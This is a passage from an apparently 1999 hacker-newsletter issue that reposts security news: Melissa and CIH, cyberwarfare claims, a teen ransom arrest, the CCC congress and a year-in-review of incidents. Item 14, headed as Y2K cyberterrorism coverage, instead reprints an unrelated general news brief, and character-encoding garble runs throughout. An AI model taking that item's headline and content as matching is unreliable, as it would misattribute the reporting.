US governments SIPRNet and even made it on board ships
in the Seventh Fleet. Numerous variants of Melissa
surfaced with distributed DoS attack capability. Melissa
was somehow traced through usenet to AOL and finally to
David L. Smith who pleaded guilty to creating and
releasing the virus.

HNN Archive for March 31, 1999 - Melissa makes it to 7th
Fleet, Kills Marines Email, DoS Variant Appears
http://www.hackernews.com/arch.html?033199#2

HNN Archive for April 2, 1999 - David Smith arrested and
released on $100,000 bail
http://www.hackernews.com/arch.html?040299

HNN Archive for April 5, 1999 - Melissa jumps air-gap onto
classified SIPRNet
http://www.hackernews.com/arch.html?040599

HNN Archive for December 12, 1999 - David Smith pleads
guilty.
http://www.hackernews.com/arch.html?121299

CIH while not as prolific as Melissa was definitely more
destructive. CIH or Chernobyl is triggered to release its
payload on April 26th every year and it has been around
for a while. It hit exceeding hard this year especially in
the Far East. Its creator was traced back to Taiwan
where he said he was sorry.

HNN Archive for April 27, 1999 - CIH strikes worldwide
http://www.hackernews.com/arch.html?042799

HNN Archive for April 29, 1999 - CIH Author Identified.
http://www.hackernews.com/arch.html?042999

HNN Archive for May 12, 1999 - China Estimates 360,000
systems Damaged by CIH
http://www.hackernews.com/arch.html?051299#3

The Virus Community Speaks
http://www.hackernews.com/special/1999/virus.html

How the Anti Virus Industry Works - Buffer Overflow
Article
http://www.hackernews.com/bufferoverflow/99/avindustry.html

AntiVirus scanning for potentially misused tools is a
doomed security strategy. - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avscanning.html

Ireland, Indonesia, China, Sweden, and Yugoslavia
Government sanctioned cyber attacks seem to be all the
rage these days. Some countries are openly announcing
their plans to create offensive cyber warriors while others
are claiming to have already suffered government
sanctioned cyber attacks.

In January a small ISP in Ireland, Connect Ireland, that
hosts the top level domain for East Timor claimed that it
had suffered a massive attack by Indonesian government
forces. Indonesia of course denied the charges.
HNN Archive for January 26, 1999
http://www.hackernews.com/arch.html?012699

Newsweek claimed that President Clinton authorized a
"top-secret" plan against Slobodan Milosevic. One part of
this plan would use "computer hackers" to attack his
foreign bank accounts. Newsweek went on to say that
the report instructed the CIA to wage "cyberwar" against
Milosevic.
HNN Archive for May 24, 1999 HNN Archive for July 6,
1999
http://www.hackernews.com/arch.html?052499
http://www.hackernews.com/arch.html?070699

Yugoslavia Cut Off from the Net? - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/yugo.html

Sweden announced the formation of a cyber defense
force.
HNN Archive for July 14, 1999
http://www.hackernews.com/arch.html?071499#3

Nobel Peace Prize laureate Jose Ramos-Horta claimed that
hundreds of people around the world were poised to
launch a cyber attack against Indonesia should there be
any tampering in the election process for East Timor's
freedom. No evidence was given for this cyber arsenal
build up and no attack ever came. Connect Ireland, the
ISP supposedly targeted by Indonesian forces earlier in
the year asked that no internet attacks be launched.
HNN Archive for August 20, 1999
http://www.hackernews.com/arch.html?082099

Connect Ireland - response to Indonesian threats
http://www.hackernews.com/press/conire.html

A Chinese military newspaper covering the activities of
China's Peoples Liberation Army has called for the
recruitment of 'civilian hackers' and for the training of
'cyber warriors' at Army schools.
HNN Archive for August 4, 1999
http://www.hackernews.com/arch.html?080499#4

We hope that this disturbing trend does not continue into
the next year. It will be an extremely bad day when the
internet is legislated as a weapon of war.

@HWA

11.0 16th CCC Congress opens Monday in Berlin 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Frank
Although the Y2K issue will keep many people from
attending this year the 16th annual Chaos Computer
Congress is expecting over 2000 people to show up.
New to this years conferances will be Lego Mindstorms
Sumo where competitors attempt to push each others
creations off a table.

Chaos Communication Congress
http://www.ccc.de/congress/

HNN Cons Page
http://www.hackernews.com/cons/cons.html

Wired
http://www.wired.com/news/culture/0,1284,33263,00.html

Chaos Reigns in Berlin
by Steve Kettmann

3:00 a.m. 24.Dec.1999 PST
BERLIN -- Any time the inimitable Berlin
hackers of the Chaos Computer Club
convene, count on cutting-edge insights
to emerge from the proceedings.

That should be true at the 16th annual
CCC congress opening Monday in Berlin,
even though the vitality of the three-day
event could be short-circuited by the
surge of Y2K angst.

After all, just the sort of gifted, seasoned
hackers and computer visionaries the CCC
attracts will in many cases be chained to
their desks, stuck on the Y2K watch.

Read ongoing Y2K coverage
Read ongoing Linux coverage
What's next: the Calendar of E-Vents
Read more about Culture -- from Wired
News

"A lot of people are not allowed to go
anywhere in these days," CCC spokesman
Andy Mueller-Maguhn said. "They all have
to stay at their companies until the end
of January to see if there are any
problems with Y2K. So this is a more
chaotic congress than ever."

Still, the show promises not to be dull.
More than 2,000 people from around the
world are expected to talk hacking, do
actual hacking, and just generally wallow
in the face-to-face contact
computer-obsessed people sometimes
miss.

The annual congresses have featured
such lively fare as a spirited debate last
year on the controversial death of famous
German hacker Boris Floricic, known as
Tron (many of his friends still think his
apparent suicide in October 1998 was
faked by police).

Tron's computer and all his files were
confiscated, and a discussion this year
will be dedicated to him.

Last summer, the CCC organized a
sprawling hacker camp outside of Berlin.
One of the highlights then was Electronic
Frontier Foundation board member John
Gilmore leading discussions on topics such
as encryption code and the ins and outs
of Linux -� all the while taking breaks for
space waffles and other diversions.

Lock-picking, a sort of mechanical-world
spinoff of hacking, was also a huge hit at
that camp, and it's expected to pick up
next week. Also popular at the summer
camp was the Art & Beauty Raum: "For
people interested in creating and
designing and using computers to build
your own world."

Other projects will be Create a Part of
c-base Contest, Computer Generated
Comics, Poetech Slam, and, maybe the
most provocatively titled of all, Lego
Mindstorms Sumo.

"Groups of people will build their stuff in
three days and fight with each other and
try to throw each other from the table,"
Mueller-Maguhn said.

The CCC has been known internationally
for years, and it played a major role this
year in helping Andrew Fernandes tell the
world about his belief that the National
Security Agency might have worked with
Microsoft to make it easier for the
government agency to bypass security
systems in the major Windows operating
systems.

Fernandes, chief scientist for the security
software company Cryptonym in
Mississauga, Ontario, chose the CCC to
help make his announcement because
tapping them is the way to tap the
worldwide hacker scene, he said at the
time.

@HWA

12.0 Canadian Youth Held for Cyber Ransom 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
A 14-year-old Toronto youngster has been charged with
electronically breaking into an unidentified e-commerce
company. The youth allegedly broke into the company's
site and changed passwords to prevent the owner from
accessing his mail. He then demanded $5,000 from the
owner to return control and was arrested when he came
to collect his cash.

CNews
http://www.canoe.ca/TechNews9912/23_hacker.html

Thursday, December 23, 1999

Hacker, 14, in jail over ransom scheme

By IAN HARVEY, TORONTO SUN

A 14-year-old hacker who held a Toronto e-commerce company for
ransom will spend Christmas in jail.

He was held over in custody to Jan. 4 at his bail hearing yesterday on
request of his lawyer.

Meanwhile, Toronto police are scanning his hard drive, seized from his
computer, to see just what else the juvenile hacker has been up to.

"We have no idea how far this goes or if this is the only company that has
been victimized," said Det. Myron Demkiw of the west-end 14 division.

He was guarded about the youth's technique and background because the
accused is a young offender.

However, Jim Carroll, co-author of the Canadian Internet Handbook,
says the youth probably isn't a computer genius.

"Most of the time hackers can do what they do because of negligence on
the part of the network administrators," he said.

The York region youth was charged with hacking to the company's site
and changing passwords to prevent the owner from accessing his mail. He
then demanded $5,000 from the owner to return control and was arrested
when he came to collect his cash.

The network hacker is one of three types, which also include the virus
builder and software cracker (someone who "cracks" the anti-piracy
protection on software to allow it to be copied and bootlegged).

While the youth certainly has some knowledge of the Internet and
computer language, he's probably not the stereotypical hacker, said
McMaster University professor David Jones of the Electronic Frontier
Canada.

He said there's a whole community of like-minded computer fans who
share information on weaknesses in security systems and passwords online.

"It's like kids playing Nintendo 64; it's a whole different world," he said.
"They know all the cheat codes to get to other levels and characters. How?
They just know."

Both Jones and Carroll said any system that allowed a 14-year-old to
breach security was "pretty crappy."

"For the kids who do it, it's like a game; they gain face by getting into
system," Jones said.

@HWA

13.0 Poulsen's List of Gifts to Get a Hacker 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ya its a little late, maybe next year? heh - Ed

From HNN http://www.hackernews.com/

contributed by Evil Wench
Kevin Poulsen has published a Christmas shopping list for
the hacker. Kevin could have shown some more
creativity, not to mention a longer list. While the items
he has chosen are ok, my wish list is quite a bit longer
and a lot more expensive. Everyone knows Hackers
want LOTS of goodies for the holidays. (LEDs = Power
Whoever has the most when they die, wins.

ZD Net
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2412532,00.html

A Hacker Christmas

Last-minute gift purchases for the
hacker in the house.
By Kevin Poulsen December 22, 1999

With each passing holiday season, it
seems I'm asked more and more
frequently, "Kevin, what do I get a hacker
for the holidays?" Here are a few answers.

The Happy Hacker keyboard from PFU
America dispenses with such frivolities as
a caps-lock key, numeric keypad, or
function keys, and finally puts the control
key back where it belongs-- next to the
left pinky finger. Don't even ask where the
Windows key is. The design is openly
hostile to everything Microsoft, making it
particularly popular with the Linux set.

The keyboard is meant for coding, though
its super-compact 11.6 x 4.3 inch
footprint makes it attractive to anyone
tired of stretching to reach the mouse.
Regrettably, it comes only in white, but
optional carrying cases in burgundy, navy,
and black make it a fashionable tote for
contemporary cyberpunks.

Too Hip?

Looking for stocking stuffers? I
recommend The Matrix on DVD. The film
itself is a hacker-culture masterpiece.
More importantly, the DVD format recently
earned a certain cachet when hackers
took the trouble to reverse engineer the
copy protection scheme so they could
watch movies on their Linux boxes.

The Matrix title has the added coolness
that comes with being so advanced that
it doesn't work on some older models of
consumer DVD players. It's not a bug, it's
a feature!

For the Kid in All of Us

Toys of any kind are a popular Christmas
treat, and there are certain kinds of
playthings that have a fundamental
appeal to hackers of all ages.

A passion for LEGO's interlocking building
blocks, popular in the 1960s, has been a
dirty little secret shared by many hackers
for generations. It got a shot in the arm
recently, when LEGO created Mindstorms,
a fully motorized, programmable robotic
block system, with infrared
communications and embedded light
sensors, among other features.

Mindstorms was meant for kids: it comes
with friendly software that lets little tykes
program their robotic creations with
point-and-click ease. Hackers, however,
are doing, well, what hackers do: writing
an open source operating system for the
brainy blocks which includes dynamic
module loading and a memory
management system. The legOS
programmers (no, I'm not making this up)
recently fixed a bug in their inter-block
packet switching code, just in time for
Christmas.

Gifting in Style

Finally, this holiday season, say it with
wearable computing. Xybernaut offers a
lightweight, 233-MHZ system that clips to
any utility belt or an optional vest.

A headset serves as a user interface,
allowing the lucky recipient of your
Yuletide generosity to issue voice
commands through a microphone while
viewing output on a one-inch diagonal
monitor that hangs in front of the
wearer's left eye. Add a wireless modem,
and the hacker in your life need never log
off the Net.

@HWA

14.0 More FUD About Cyberterrosists and Y2K 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Gh0st47
As we get closer and closer to that magical day,
January 1st, the media will continue to increase the FUD
factor regarding Y2K. Since the initial problem of
computer meltdown seems to be fading away the issue
of viruses and terrorist attacks is getting more
attention. While the threats are definitely real it is
doubtful they are fantastic as most would have us
believe.

Access Atlanta
http://www.accessatlanta.com/partners/ajc/epaper/editions/today/news_23.html

NATION IN BRIEF
Monday � January 10

Slain soldier's parents ponder suing Army

The parents of slain Pfc. Barry Winchell are considering suing the Army for
failing to protect their son from anti-gay harassment. In an interview Sunday,
Pat and Wally Kutteles said military officials at Fort Campbell, Ky., did not
take sufficient precautions to prevent Winchell's July 5 beating. Winchell,
who was rumored to be gay, was attacked by another soldier as he was
sleeping. Pat Kutteles said commanders at the 101st Airborne Division
tolerated a four-month harassment campaign against her son in clear
violation of the Pentagon's ''don't ask, don't tell'' policy toward gays, a
standard that has come under mounting criticism in recent weeks.

The Kansas City, Mo. couple's comments came a day after Army Spc.
Justin R. Fisher, 26, pleaded guilty to obstructing justice and lying to
military investigators in connection with Winchell's death. Fisher, who was
sentenced to 12 1/2 years in prison, wiped blood off the bat that Pvt. Calvin
N. Glover used to kill Winchell. Prosecutors had said Fisher, who was
Winchell's barracks mate, encouraged Glover to attack Winchell. Glover, 18,
was convicted last month of premeditated murder and sentenced to life in
prison with the possibility of parole.

FBI watched mayor for 40 years, paper says

The late Detroit Mayor Coleman Young was under FBI surveillance for
roughly four decades, The Detroit News reported Sunday. Records obtained
under the federal Freedom of Information Act show the surveillance began in
the 1940s when agents who suspected the well-known labor activist had
Communist ties followed him to union meetings, the newspaper said. Young
was mayor for 20 years, retiring in 1994. He died in 1997.

Elderly avoid crime by staying at home

Violent criminals attack Americans age 65 or older far less often than
younger men and women, probably because older people do not go out at
night as much, the Justice Department reported Sunday. There were an
average of 5.3 violent crimes for every 1,000 U.S. residents age 65 or older
each year from 1992 through 1997, the department's Bureau of Justice
Statistics said. About 22 percent of elderly violence victims reported they
never went out at night for entertainment, shopping or other activities.

Controversial exhibit ends run in New York

Art lovers and the morbidly curious flocked to New York City's Brooklyn
Museum in large numbers on Sunday for a last look at the controversial
''Sensation'' art exhibit with its dung-decorated Madonna. As the crowd
swelled on the final day of the exhibit's three-month run, about two dozen
demonstrators stood outside, singing hymns and reciting ''Hail Mary,'' a
Catholic prayer, in protest of what they claim is a blasphemous painting of
the Virgin Mary. Chris Ofili's painting, ''The Holy Virgin Mary,'' features the
Virgin Mary decorated with elephant dung.

@HWA

15.0 The Datacore Encryption Suite 1.0 Released on Christmas 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The Hex
The Datacore releases The Datacore Encryption Suite
1.0 on December 25. DES1.0 consists of an easy to use
interface, and uses many well know algorithms. They
hope you enjoy the program.

The Datacore
http://www.tdcore.com/newbuild/fractal/preview.html (197k download)

@HWA

16.0 One Third of UK Vulnerable to Online Attack 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A survey of 150 UK-based IT managers and directors who use the Internet as a
business tool, found that one third of them did not have adequate measures in
place to prevent a cyber attack. The study, conducted by Novell, found that 37%
of UK companies on the net have no firewall and 44% do not make use of
authentication.

Info-Sec.com
http://www.info-sec.com/internet/99/internet_122799b_j.shtml

@HWA

17.0 Grades Changed at NY School 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by pyrodude2001
According to school officials at Spencerport High School
a student may have accessed the grading system of the
school's computer and changed a few of them. Officials
are unsure of how the intrusion occurred or if in fact
any grades where changed. As a precaution teachers
will manually verify the grades in the computer with
their records.

Rochester News
http://www.rochesternews.com/1225grades.html
(Sorry, link gave us a 404 - Ed)

@HWA

18.0 Cops Wanted, Hackers Need Not Apply 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
What do Deloitte & Touche, Ernst & Young and
PricewaterhouseCoopers all seem to have in common?
According this article it is that all of them are looking for
ex-law enforcement personnel to work in their computer
forensic divisions. No, they don't want people who have
been dealing with computer security since they where
three, they want someone with a background in dealing
with rapists and hit men.

NY Times - Yes registration is required. Just use a fake address.
http://www.nytimes.com/library/financial/personal/122699personal-cybercrime.html

December 26, 1999

CALLINGS

The Hunt for Cybercrime

Issue in Depth
The New York Times: Your Money

Forum
Join a Discussion on Career and Workplace Issues

By LAURA PEDERSEN-PIETERSEN

racking down embezzlers, computer hackers, money launderers,
shady stock promoters and other white-collar criminals may lack
the pizazz of James Bond outwitting Goldfinger or decapitating Oddjob.

But in a post-cold-war global economy,
don't be surprised if some of the first movie
heroes of the new millennium are
bespectacled, Palm VII-packing auditors
from Big Five accounting firms, Web
browsers at the ready.

"The breadth of criminal activities facilitated
by global computer networks, such as lifting
personal credit card information, redirecting
electronic funds and stealing proprietary and
other confidential information, continues to
grow," said Stephen O. Pierce, a partner at
PricewaterhouseCoopers who heads its
investigations unit.

And crimes could hit close to home. One of
the firm's clients, the Pension Benefit
Guaranty Corporation, a federal agency that
sends checks to some 500,000 retirees,
recently found its computer defenses penetrated by security experts who
could have robbed it blind. The reason they didn't was that the break-in
was a test of the agency's systems, determining that for all the electronic
safeguards, it was vulnerable to external and internal attack.

With businesses rushing to go online, theft and fraud are not far behind.
E-commerce has spawned its own array of hard-to-detect cybercrimes,
like transaction fraud and Web site destruction. The crimes are producing
not only fear in corporations, but also many new assignments for auditors
and consultants, who are increasingly being asked to trace e-mail and
ferret out smoldering diskettes.

But in trying to find gumshoes who can sniff out white-collar crime from
three cubicles away, Big Five recruiters obviously won't find many
candidates on the B-school campus. That is why, over the last 18
months, almost all of the 25 new employees hired for the Deloitte &
Touche forensic and investigative services division came with
law-enforcement experience. And PricewaterhouseCoopers, in addition
to hiring former F.B.I. and Interpol agents, has just recruited Scott
Charney, 43, formerly a top cybercop at the Justice Department.

At Ernst & Young, the forensic investigations practice has more than
tripled in two years, said Cheryl Sparkes, a partner. "We've gone from
30 to 100 employees and we're aggressively seeking more," she said,
"mostly with law enforcement and other investigative backgrounds."
ONSIDER Don M. Svendson, 50, hired last year after a 26-year career
with the Royal Canadian Mounted Police to run Deloitte & Touche's
investigative office in Chicago. "There's no end in sight to the rise in
embezzlement, executive malfeasance and money laundering," he said.

Though a roaring economy and the dot-com invasion make pastures
greener for criminal activity, Mr. Svendson says there is more to it than
that. "Corporations are leaner and meaner, the management turnover is
high and companies can't exercise all the controls they really need," he
said.

Mr. Svendson may well be a typical recruit -- someone with professional
training in criminal justice and decades of hands-on experience. While the
job may not sound as adrenaline-pumping as his previous work -- which
included commanding a SWAT team in Manitoba and breaking up riots
-- he says he finds it thrilling.

Having extracted confessions from rapists and hit men, Mr. Svendson
was recently asked to put his interrogation skills to work on someone
suspected of embezzlement at a company after irregularities were found.
Mr. Svendson said he got the employee to confess; the employee was
dismissed. "You need to know what body language to look for and how
to ask the questions," Mr. Svendson said.

Ed Rial, 40, recently made the leap from criminal justice to corporate
fraud investigation, and is now a Deloitte partner. Mr. Rial, who dreamed
as a boy of being a detective, graduated from the University of
Pennsylvania law school in 1984 and took a job at the Justice
Department in Manhattan. He spent almost a decade as a federal
prosecutor and four years in charge of a New York office of the
department's business and securities fraud unit, bringing to trial cases
involving drugs, murder and kidnapping.
With Deloitte since November, Mr. Rial specializes in hunting down
corporate fraud, kickback schemes and insurance fraud. These days, he
sees stock fraud as the fastest-growing white-collar crime. In particular,
he cites outfits that take shell companies public, trade with cronies, then
dump the shares into the public's lap through cold calls.

"Many of these boiler-room brokers worked for years as telemarketers,"
Mr. Rial said. "They have phenomenal sales skills and are completely
unscrupulous. And it's incredible the amount of participation they get
from smart people -- doctors, lawyers and educators."

The quick stock-market success of Internet companies, he added, makes
people more susceptible to high-technology pitches from fraudulent
promoters. And many people don't think of white-collar crime as a big
issue anyhow.

"It's because the perpetrators are often the people you grew up with, the
best friend of your father," Mr. Rial said."They're almost always people in
very senior positions. Believe me, no one ever says, 'I always suspected
him.' "

@HWA

19.0 IDS Signature Database Open to the Public 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by vision arachNIDS (Advanced Reference Archive of
Current Heuristics for Network Intrusion Detection Systems) is

now open to the public. The database is an attempt to profile
probes, exploits, and other network-borne attacks by way of packet
details, example sniffer traces of the attack, and a signature that
can be exported for use in free IDS products such as Snort. This
preliminary release will be greatly expanded upon as time goes by.

Whitehats.com
http://whitehats.com/

@HWA

20.0 InfoSecurity 1999 Year in Review 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
InfoSecurity Magazine has published its 1999 Year in
Review. Their list contrasts greatly with the top stories
of 1999 as picked by HNN.

Info Security Magazine
http://www.infosecuritymag.com/dec99/1299Yr.inRev.htm

HNN's 1999 Year in Review
http://www.hackernews.com/special/1999/99topstories.html
(See elsewhere in this issue)

Info Security Mag:

1999 Infosecurity Year-in-Review From Melissa to Explore.Zip, from Hotmail
to TWINKLE, from BubbleBoy to BO2K, from InfraGard to Fidnet, the
events of 1999 put information security in the public eye and on
the corporate roadmap like never before. As we look back on the year
that was, it�s clear just how important infosec has become to the
stability and prosperity of commerce, communication and international peace.

BY M.E. KABAY

This article is excerpted from ICSA Labs�s Infosec Year-in-Review
database, which classifies hundreds of cases and issues spanning the
field of information security. The complete report will be available for
download as a PDF file in early 2000. www.icsa.net

1999 was a remarkable year in the field of information systems security.
Ten years from now, the last year of the second millennium will be
remembered for a number of important events:

� In the fight against malicious code, 1999 was the year the AV experts�
direst predictions came true: e-mail-enabled viruses and worms are now a
serious threat to systems everywhere. Because these new forms of
malicious
software can spread so fast through the �Net, waiting for
antivirus vendors to produce updates to signature tables is not enough to
protect everyone. In 2000, the AV industry will need to develop better
heuristic techniques to identify the abnormal behavior of such viruses/
worms, stopping them even if they aren�t immediately identified by their
signatures.

� In addition to losing its landmark antitrust case with the Justice
Department, Microsoft was again the target of widespread criticism in
1999 for its "security" practices, including its absurd policy of turning
every consumer product
it makes into a programming language (or the
equivalent of an operating system). The security community�s message to
the Redmond software giant is now louder than ever: Stop this nonsense of
allowing automatic execution of macros when opening Word and Excel files.
And it would be helpful if Windows had provisions for enabling pop-up
warnings that could be configured�preferably by default�to warn naive
users about the risks of opening executables of unknown origin. Will
Microsoft listen? Only time will tell. Meanwhile, the public release of
Win2K is only eight weeks away.

� The number of successful attacks on Web sites increased dramatically in
1999. More and more script kiddies are plastering graffiti on government,
industry and educational Web sites as if they were engaged in a video
game.
Systems administrators continue to be deprived of adequate
resources and management support to keep Internet-visible networks
patched so that vulnerabilities are fixed before someone can exploit
them.

� In addition to the script kiddie wars, 1999 witnessed several cases of
Web defacement that seemed to be a form of information warfare. Chinese
and Taiwanese hackers attacked government sites on both sides of the
water,
and Serbian and Kosovar hackers did the same to each other�s
governmental sites.

� Privacy has developed as perhaps the single greatest concern of the
ordinary Internet-using public in 1999. There have been many legislative
initiatives to improve privacy in the United States and elsewhere; the
new EU Data
Privacy Directive has serious implications for all
organizations intending to do business with Europe.

� Ah, yes, and then there�s Y2K. I deliberately omitted mention of the
Y2K problem in the following article, since most would argue it�s not
really a "security" issue to begin with. Suffice it to say, the Y2K
transition may be the best
opportunity we�ll ever have to witness
the equivalent of information warfare on our highly technological
society. I hope there won�t be any trouble, but if there is, we should
observe carefully and learn quickly from our mistakes.

Now, here�s a review of some of the year�s other major events, broken out
within nearly two-dozen categories.

Breaches of Confidentiality
4.22.99 Joe Harris, a computer
technician at the Seattle-area "Blarg! Online" ISP, discovered that
improperly installed shopping-cart software, used widely on the �Net to
simplify shopping, can allow anyone to see confidential data, such as
credit card numbers.

Security analysts pointed out that the plain ASCII file where such data
are stored should not be on the Web server at all�or if it is, the file
should be encrypted. Initial evaluation suggested that the weakness
affects at least several
hundred, and possibly many thousands, of
e-commerce sites where the software was improperly installed.

Wiretapping, Interception (Not Jamming)
4.27.99 The Australian
Security Intelligence Organization (ASIO) announced its intention to seek
remote access to computer records of suspects under investigation.
However, a spokesman for the ASIO said the organization had not yet broken
into computers using existing technology, since that was not permitted
under current law.

Data Diddling, Data Corruption
3.01.99 We learned in March that two
more Chinese criminal hackers were sentenced to death in China in
December 1998. The twin brothers stole 720,000 Yuan (~US$87,000) from a
bank in Zhenjiang and transferred the money to their own accounts.

Viruses, Hoaxes, Trojans
3.27.99 On Friday, March 26, CERT/CC
received initial reports of a fast-spreading new MS-Word macro virus
called Melissa. Once loaded, it used the victim�s MAPI-standard e-mail
address book to send copies of itself to the first 50 people on the list.
The virus attached an infected document to an e-mail message bearing the
subject line, "Important Message From <name>," where <name> was that of
the inadvertent sender. The e-mail message read, "Here is that document
you asked for � don�t show anyone else ;-)" and included an infected
MS-Word file as an attachment. The original infected document,
"list.doc," was a compilation of URLs for pornographic Web sites.

3.30.99 Hot on the heels of the Melissa outbreak, a similar virus
attacking MS-Excel spreadsheets appeared on the �Net at the end of March.
The so-called PaPa macro virus was more virulent than Melissa in that it
sent out
copies of itself to 60 names drawn from the victim�s e-mail
address book, and did so every time an infected document was opened.

4.26.99 According to newswire reports, the Chernobyl computer virus
struck hundreds of thousands of computers in Asia and the Middle East,
with Turkey and South Korea each reporting 300,000 damaged computers.

5.28.99 Network Associates�s antivirus labs warned of a new Trojan called
BackDoor-G, which was being sent around the �Net as spam.

6.11.99 The Explore.Zip worm appeared as an attachment to e-mail
masquerading as an innocuous compressed WinZip file. The executable file
used the icon from WinZip to fool people into double-clicking it, at
which time it
began destroying files on disk.

9.02.99 Symantec announced the discovery of a dangerous MS-Word 97 macro
virus called Thursday, which had a trigger date of Dec. 13. This virus
was seen in the wild on about 5,000 computers in Austria, France,
Germany,
Ireland, Latvia, Poland, Switzerland, the U.K. and the U.S.
The payload could erase all files on the victim�s C: drive.

9.20.99 A couple of new Y2K-related virus/worms were discovered in
September. One e-mail Trojan, called Y2Kcount. exe, claimed that its
attachment was a Y2K-countdown clock; actually, it sent user IDs and
passwords out into
the �Net by e-mail. Microsoft reported finding
eight different versions of the e-mail in circulation.

The other Y2K virus, named W32/ Fix2001, came as an attachment
(ostensibly from the systems administrator) and urged victims to install
the "fix" to prevent Internet problems related to the Y2K transition.
Actually, the virus/worm
would replicate through attachments to all
outbound e-mail messages from the infected system.

11.08.99 In early November, a worrisome new worm called BubbleBoy
appeared on the scene. This proof-of-concept worm was sent to Network
Associates, which immediately posted a free software patch and alerted
the FBI of
the danger. The problem with this worm was that it would
infect a host if an MS-Outlook user merely highlighted the subject line
of the carrier e-mail message�no double-clicking was required. The worm�s
payload was mild�changes to the registry and a simple display screen�but
experts warned that the same techniques could carry much more dangerous
payloads in future variations. The worm spread by mailing itself to every
e-mail address on the infected system�s address list, thus posing an even
greater potential danger than the Melissa virus. This attack again
demonstrates the foolishness of allowing automatic execution of code by
e-mail and word-processing packages.

Industrial Espionage, Infowar
1.04.99 An article in January reported
on the RAND Corporation�s DoD-commissioned report, "Strategic Information
Warfare Rising," issued in mid-1998. The report fueled the growing debate
within the Pentagon about the wisdom of pursuing offensive information
warfare capabilities. Opponents argued that widening the sphere of
warfare to include cyberattacks on critical infrastructure would only
increase the likelihood of successful attacks on the United States.

The report laid out four basic scenarios for future developments in
infowar (IW). Daniel Verton, writing in Federal Computer Week, summarized
these scenarios as follows:

� U.S. supremacy in offense and defensive strategic IW.

� A club of strategic IW elites, whereby a policy of no first use of
strategic IW capabilities could be established.

� Global "defensive dominance" in strategic IW, whereby a regime would be
established to control the spread of strategic IW similar to biological
and chemical weapons.

� Market-based diversity, whereby the damage or disruption achievable
through a strategic IW attack is modest and recovery is fast.

3.30.99 When NATO began bombing Serbia in March, Serbian hackers began a
low-level campaign of harassment directed at U.S. government and military
agencies. The "Black Hand" hacker group�possibly named after the

notorious Sicilian secret society associated with the Mafia�and the
"Serbian Angel" hackers threatened to damage NATO computers in
retaliation for the war against the Serbs.

On March 29, the White House Web site was defaced by red letters reading
"Hackerz wuz Here." Speculation was rife that anti-NATO activists were
involved. According to a Russian newspaper, unknown hackers on March 30

damaged a main NATO Web server, forcing it offline for at least a
half-hour. The claim, however, was unconfirmed by NATO sources.

Penetration, Phreaking, Legal Action
9.10.99 According to a report
in The Wall Street Journal, the successful Y2K-compliance tests carried
out in early September by the North American Electric Reliability Council
(NERC) with the involvement of more than 500 utilities, electric
cooperatives, power pools and power plants were marred by a
criminal-hacker penetration of the Bonneville Power Administration
center. The Bonneville center happened to be where Bill Richardson, the
Secretary of the Department of Energy, was observing the tests.

9.29.99 Frans De Vaere admitted breaking into the Web site of a Belgian
bank in mid-August. He stole logon IDs and passwords and successfully
accessed the account balances of many customers. Luckily, De Vaere was

unable to effect any transactions.

The bank, identified as "Generale de Banque" in a report in The Scotsman
newspaper, refused to take legal action against De Vaere. However, the
Skynet ISP run by the state telecom company, Belgacom, was not so

accommodating. The criminal hacker broke into more than 1,000 Web sites
on Skynet and stole the credit card numbers of about 20 clients. Police
began an investigation, but unfortunately Belgium has no specific law
addressing computer crime, and so the intruder went unpunished.

Counterfeits, Forgery (Including Piracy), Shoulder Surfing
4.10.99
Jim Loney wrote a summary for Reuters about the losses due to piracy of
intellectual property and counterfeiting. Some key points of Loney�s
report include the following:

� U.S. Customs Commissioner Bonni Tischler predicted that copyright
violations and counterfeiting was "going to dwarf every type of crime in
the next millennium."

� U.S. companies lose an estimated $200 billion a year to product piracy
involving designer clothes, shoes, handbags, software, CDs and videos.

� Worldwide, software piracy costs industry $11 billion a year.

� 38 percent of the 615 million new software product installations are
illegal copies.

� 97 percent of all the software in Vietnam is stolen.

� More than 90 percent of all software in Bulgaria, China, Indonesia,
Lebanon, Oman and Russia is stolen.

� 60 percent of the software sold via online auctions is illegitimate.

Sabotage (Excluding Web Sites)
4.14.99 In Melbourne, Australia, a
33-year-old network administrator pleaded guilty to three charges of
damaging property and 30 charges of computer trespass. Ya Ge (Jacob) Xu
admitted hacking into his former employer�s systems at Integraph Public
Safety to plant a virus and to "cause trouble" when he was refused
acceptable payment for unpaid overtime. Xu was fined AU$6,000, but was
not sentenced to jail time.

9.29.99 A criminal hacker calling himself "Red Attack" threatened Belgian
firms with electronic sabotage in a misguided attempt to draw attention
to security vulnerabilities. A few weeks later, a different person
claimed he was
the real Red Attack, saying he would switch Belgian
electrical power off for a couple of hours on Sept. 29 and break into the
Belgian Prime Minister�s e-mail account. After earnest conversations with
a company director of the Electrabel utility, the idiot agreed that maybe
his demonstration wasn�t such a great idea after all. In the end, the
threats all evaporated in yet another hoax perpetrated on gullible
journalists and officials.

Quality Assurance (Security Products)
8.31.99 In August, two serious
